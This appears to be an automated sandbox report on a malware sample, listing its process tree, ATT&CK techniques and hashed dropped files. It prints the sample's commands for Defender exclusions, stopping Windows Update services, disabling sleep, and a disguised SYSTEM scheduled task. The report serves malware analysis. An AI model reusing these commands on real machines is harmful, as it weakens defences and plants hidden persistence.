PID:5376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff88d2346f8,0x7ff88d234708,0x7ff88d234718
1⤵
PID:4264

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7400

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:6756

C:\Users\Admin\AppData\Local\NextSink\oetgeezju\TypeId.exe
C:\Users\Admin\AppData\Local\NextSink\oetgeezju\TypeId.exe
1⤵
PID:4884
- C:\Users\Admin\AppData\Local\NextSink\oetgeezju\TypeId.exe
  C:\Users\Admin\AppData\Local\NextSink\oetgeezju\TypeId.exe
  2⤵
  PID:6732
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
    3⤵
    PID:6880
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
      4⤵
      PID:624

C:\Windows\System32\sc.exe
sc stop UsoSvc
1⤵
- Launches sc.exe
PID:4396

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
1⤵
- Launches sc.exe
PID:1660

C:\Windows\System32\sc.exe
sc stop wuauserv
1⤵
- Launches sc.exe
PID:7440

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:3180
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-ac 0
  2⤵
  PID:5440
- C:\Windows\System32\powercfg.exe
  powercfg /x -hibernate-timeout-dc 0
  2⤵
  PID:540
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4144
- C:\Windows\System32\powercfg.exe
  powercfg /x -standby-timeout-ac 0
  2⤵
  PID:6184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:6000

C:\Windows\System32\sc.exe
sc stop dosvc
1⤵
- Launches sc.exe
PID:6432

C:\Windows\System32\sc.exe
sc stop bits
1⤵
- Launches sc.exe
PID:4728

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:7184

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:8112

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5788

C:\Users\Admin\AppData\Roaming\swfcfab
C:\Users\Admin\AppData\Roaming\swfcfab
1⤵
PID:6344
- C:\Users\Admin\AppData\Roaming\swfcfab
  C:\Users\Admin\AppData\Roaming\swfcfab
  2⤵
  PID:8044

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
51c3743b948c0b72484e05a54c77f42c

SHA1
d7bd495de1be2f4fa5fedb7d01e3942803eb8389

SHA256
e95e64300e0d3a6145b818742c70d7198570aa1c3f64a70a67d1ee632656ae33

SHA512
c471f4dcd4399da2ec2da538dac8a8c7ac14aad8efa72b7505923f6f73c3c6f23f987a5cc2ccf8d232fecc3d38419d514679e22ca8ebb86017c2959aba882e24

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8e1899ff3e5a7fe9c04f560c138ea5a4

SHA1
df193616767cb027d0cdf8271a0e4629d57fac29

SHA256
afcbecceec8e55661a7ed2feea52e6b6beb577f87754f7a3092eaffd3cc404a8

SHA512
d2211feccd3f2e0534db42cf57e6b47bbc3d9b1ba50136eb0092c872262e481936c470fc3be7b510d0c8babd61a3abe789e29507690c51b264b64cf816117a15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6f9bc20747520b37b3f22c169195824e

SHA1
de0472972d51b2d9419ff0d714706bef0c6f81d8

SHA256
a176ef484b676f39eaefe30f33df548ef0e4e3b34c4651ac3fb4351404d288b0

SHA512
179e5be96746cfbcc9483de68527d96464f3ce6cb09dc4b5e546a93c5e1dad36ab842a4cdfa336169af4ca459bdc42a2cac72e577699a455ffb7efd9c1c80f11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6f9bc20747520b37b3f22c169195824e

SHA1
de0472972d51b2d9419ff0d714706bef0c6f81d8

SHA256
a176ef484b676f39eaefe30f33df548ef0e4e3b34c4651ac3fb4351404d288b0

SHA512
179e5be96746cfbcc9483de68527d96464f3ce6cb09dc4b5e546a93c5e1dad36ab842a4cdfa336169af4ca459bdc42a2cac72e577699a455ffb7efd9c1c80f11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4935c599929b7db685de2e905cca221a

SHA1
2eae341e194ecf7152428f7683d21b3186b07951

SHA256
aefa004c659d2084600ab0446393a0b7589399d091089d17e68f4b9e92fad9fa

SHA512
3a674f857a83177cceca5a15eec7c44d7b7c3c38ad9d5b89c69304f888f88e38e497d3d3d6aa3c8cfce96dc0718ffb47fb39e8c98abf964d62ca62a19243044a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6dded92ec95cf9f22410bdeac841a00d

SHA1
83c32c23d53c59d654868f0b2a5c6be0a46249c2

SHA256
1840d5c60c79874359414677662439087173c575d814c07ebe661ae1cebb639e

SHA512
e13df653c0364be2b61619fe3d46799e10a565b41f33d3ce15e50397f8f9aa328e8c821212efe10cfe3b8283c1e8c7e9eb15f9674fc456837d6ee8c38bc8b0d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\7593d6a9-474e-4a01-81a3-1dbe258699df.tmp

Filesize
5KB

MD5
951669e0ad979c862a6a81772b71bb86

SHA1
a667494d6cd5479e4e5133c7cbb991dde3d3e37a

SHA256
6e5031d4f7b50eaf36833a2189386b074348b2028e43b605591a0ef300ded4ba

SHA512
f58d0a587c0904df95e48ec45bcca2523f09a9099ad4855ce27878f2a17e10740e2069011bde0798cfb3baf400a349555be441ea3af39b7a553fe69a67e2c0be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\99490b9c-cd69-49dd-9b1f-ab816acc30b3.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
21KB

MD5
7d75a9eb3b38b5dd04b8a7ce4f1b87cc

SHA1
68f598c84936c9720c5ffd6685294f5c94000dff

SHA256
6c24799e77b963b00401713a1dbd9cba3a00249b9363e2c194d01b13b8cdb3d7

SHA512
cf0488c34a1af36b1bb854dea2decfc8394f47831b1670cab3eed8291b61188484cc8ab0a726a524ecdd20b71d291bcccbc2ce999fd91662aca63d2d22ed0d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
20KB

MD5
923a543cc619ea568f91b723d9fb1ef0

SHA1
6f4ade25559645c741d7327c6e16521e43d7e1f9

SHA256
bf7344209edb1be5a2886c425cf6334a102d76cbea1471fd50171e2ee92877cd

SHA512
a4153751761cd67465374828b0514d7773b8c4ed37779d1ecfd4f19be4faa171585c8ee0b4db59b556399d5d2b9809ba87e04d4715e9d090e1f488d02219d555

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
33KB

MD5
fdbf5bcfbb02e2894a519454c232d32f

SHA1
5e225710e9560458ac032ab80e24d0f3cb81b87a

SHA256
d9315d0678ac213bbe2c1de27528f82fd40dbff160f5a0c19850f891da29ea1c

SHA512
9eb86ebb1b50074df9bd94f7660df6f362b5a46411b35ce820740f629f8ef77f0b49a95c5550441a7db2b2638f0ed3d0204cb8f8c76391c05401506833b8c916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
224KB

MD5
4e08109ee6888eeb2f5d6987513366bc

SHA1
86340f5fa46d1a73db2031d80699937878da635e

SHA256
bf44187e1683e78d3040bcef6263e25783c6936096ff0a621677d411dd9d1339

SHA512
4e477fd9e58676c0e00744dbe3421e528dd2faeca2ab998ebbeb349b35bb3711dcf78d8c9e7adba66b4d681d1982c31cac42024c8b19e19537a5615dac39c661

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000039

Filesize
186KB

MD5
740a924b01c31c08ad37fe04d22af7c5

SHA1
34feb0face110afc3a7673e36d27eee2d4edbbff

SHA256
f0e1953b71cc4abbffdd5096d99dfb274688e517c381b15c3446c28a4ac416e0

SHA512
da7061f944c69245c2f66b0e6a8b5a9bca91bda8a73f99734dcb23db56c5047de796fa7e348ff8840d9ac123436e38a4206408573215b7e5e98942ea6d66bb7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
f9130507dc242db41d58ab12cd6219e4

SHA1
596658b4695a37c86d961d2eda3494998351ba5f

SHA256
bc7600893b9785072751de02ad93510a5246f6194ac8cf719d532686dd170cb0

SHA512
67519743a3e61c69964305da079c65f62aaaac6c29c20bd247b3c483ac4de32476ba6fdcb6ad18f81cb55923cf8c12a2288cea6255df7e062c74ab8b6026bd9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
bd94743e20bb95863e6fa26d142777e8

SHA1
90a1d80693c01d1d4a625bff82287a169497ba6e

SHA256
54ccb8de397235dd3670d4017b4295b77fe4c02b30d15cf2ad0747b255cbe0d5

SHA512
826b78a1f525ef3701b2f1908451c31634d8785395533165e84b3876a454b4af5f820525b157e8c8915996f9934af75f10491e784448d9a75c23f094b0443b98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
d3e9b1d8e402edfa1595a89e07e2b57a

SHA1
4027492ec6f511f9882a8daf4ccc2f1f98623617

SHA256
e651d53e32ca5960ca6a35945262669465b54247e617b403e3bd04a045b81df8

SHA512
fbe563a83492277c29154e442217ef88643cad6993fbc8f21bb879b030f432ae65db17bd3ca4cba04e7b24f5c5fdc0deec1ba75aa6b5e4fcc4fabad7ab3bce4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
90b4ad0f0cab1b3dfbcde95d7b3ae9d3

SHA1
0badfbf98863177ea9623d25b7fbfbb8a11723d2

SHA256
aa73797236cc49901d5b0f44b0dae78f46db382432b5a09c062cec836850f925

SHA512
128833ea8a28242d2e3babef3d5a0e4a51c9706fdfc764120b4af2102988479ec0f1fc897f4f51a0129c8e59637bf841b2f2e98b336aac4275ae4fcb4cd60c73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
1368a2f6be8d1b5d5ddbfd6f7a5b60c9

SHA1
619b5436d9929b42684d381c010911dcb3a75c27

SHA256
22f9d48e3ed64d0e9bc18147de45c60f5fa72c292a984bdf7da987545acf9f17

SHA512
23a74d890b355521105fd29e7a58327d14a64c996bc11ca09d0f7fe44e216421640f6454ee0710f99e5bafb1087368d329c0c1b72f48e6e4ab2cfeec682b6698

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
b4b81c95a290c7712cae6427e17f06a2

SHA1
19630664ba4b327399c5035955f5e2dc40db5a23

SHA256
d7693071a72a6e7e8a1e1b0cd2b8c39ad2b01f3d58ef39cae6f030af12d8c84c

SHA512
fdf1d253d34342eb822e7a722d0d3f9f038da6e6c80ae4fdea2f252ba4d7d91a52ab3bdae9fb8d12b8cc23b6bb485941d3e8a418ee08238a3769eeab468aaa61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
e05436aebb117e9919978ca32bbcefd9

SHA1
97b2af055317952ce42308ea69b82301320eb962

SHA256
cc9bd0953e70356e31a957ad9a9b1926f5e2a9f6a297cdef303ac693a2a86b7f

SHA512
11328e9514ffaa3c1eab84fae06595d75c8503bd5601adfd806182d46065752885a871b738439b356d1bb2c1ac71fc81e9d46bd2d0daa1b2ba0f40543bf952b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8e1edb5f-bab5-4f56-a61f-a949af0fb63b\index

Filesize
24B

MD5
54cb446f628b2ea4a5bce5769910512e

SHA1
c27ca848427fe87f5cf4d0e0e3cd57151b0d820d

SHA256
fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d

SHA512
8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
8aa170211f0dd6f7ee8db0a582dcbcbb

SHA1
5d0e32c546c547e1a69c135535a5e8de78d081bc

SHA256
998fa94ad13e23aed72a4041d934ad83c0365b739dea04ce1ccd3363473a346b

SHA512
1c6963744034aa67a403a6e551a6aa0a8d3700afcb32ca5b3ddbeb096728e8b3c10602053f168384f2b46552a43dc86dfb819a8a571a2eb275f73758f6626b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
146B

MD5
51c08e6fd61e82a1daef180bfae7dede

SHA1
31fccfd2b0dc308b3c1f5777ee34f149ce864525

SHA256
f784cf2efa296760e7b749281229d819540e4bf52e77e99f4ab0802f0bcf497c

SHA512
e13f114f148afeddd8971b0c2e9b0c7e867f3be4bd42a3df719bddbb5596d2b0261b55e0034f3957890f0a9551542ad01138769704e7f6e524de34c9baf6f901

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
155B

MD5
36720e9ed3ddad16fd57a8b99da93438

SHA1
f18c77d5d95cd81f2cfc65ca68975ca165f9d735

SHA256
146f6d8bef3d6a74ed003eb646c737a0e7627c01fcca9591670c4c0e44005eed

SHA512
6dccf43520d8a9f078d57c53d8a56ce35c648332dd21dfcb3de0ad5fe10f20c19b97a084cd18bd95d609ce020fe03338a35ad1451b43210a439ba84e596fbb43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
215B

MD5
3279aeec76350b25ee1f756cf9827b34

SHA1
7d0d80354d81281f2df9fbb8c55f402bd71f15a7

SHA256
5f4320c02ee130dc178cd678690ea9c859c08a185d2266ca908f619e40f67671

SHA512
aee18c7bc9993ccc2d60e1e336a6a258867228eb2893e969c98e0804e91dff8d926b527971af67ace47e7d6ec84ec162cd8eccc54d0a739aede03f64c24c1db6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
82B

MD5
ea1f817bc4c611d4e7fdbe334ccc5872

SHA1
fc744ed595a67f65e6043915149583041ded6757

SHA256
26387d59c97b4df82471a181f6761a1df7efffe47d5c27666ef60693e35977d3

SHA512
d137b1dd58e9b81631f7264cc651b75962f1ceca6e4d05e50a4b7faf4ea632237f356e1700e913696068cb6dc6124390bacbc159ccdf3446480c40f254bdaee5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
151B

MD5
2a2d1b29b99b87ea81deca9c9c7e31d9

SHA1
4b17ee8d0538342f8023eb515384ee3ef2227c22

SHA256
97e9082c21f7399d2e1e9c02ef596cd9fdd2eecda865a0f03e1144414e4bbc41

SHA512
29374506b57bf98edee21c2b49b2f0514edcf9613e2a83adbeed7cb68f3f1420440bd0ad8cca7a4b6378a213bfbe83022ab06fcc1fbfb8f9b949bb52601a90d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\8f7abdeb3486c1b8780fede76afc20e044eff1b5\index.txt

Filesize
147B

MD5
16f64a396079b0302e7fc072e7e21c0d

SHA1
2d92f51c8e6019815be5fe9e56f591864a38a6cc

SHA256
